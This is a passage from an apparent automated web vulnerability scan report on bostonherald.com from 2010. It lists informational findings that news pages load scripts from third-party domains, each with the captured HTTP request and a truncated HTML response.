HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:43:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.95. http://bostonherald.com/news/international/europe/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/europe/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.96. http://bostonherald.com/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=home&position=recent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=home&position=recent HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.97. http://bostonherald.com/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.98. http://bostonherald.com/news/international/europe/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=news&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/europe/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=news&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/international/europe/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=news&position=recent_bullet HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:44:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.99. http://bostonherald.com/news/national/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js

Request

GET /news/national/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:33:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.100. http://bostonherald.com/news/national/general/view/20101106blacks_struggle_with_72_percent_unwed_mothers_rate/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/general/view/20101106blacks_struggle_with_72_percent_unwed_mothers_rate/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/general/view/20101106blacks_struggle_with_72_percent_unwed_mothers_rate/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:35:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.101. http://bostonherald.com/news/national/northeast/view/20101107first_gay_episcopal_bishop_to_retire_in_2013/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/northeast/view/20101107first_gay_episcopal_bishop_to_retire_in_2013/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/northeast/view/20101107first_gay_episcopal_bishop_to_retire_in_2013/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.102. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.103. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
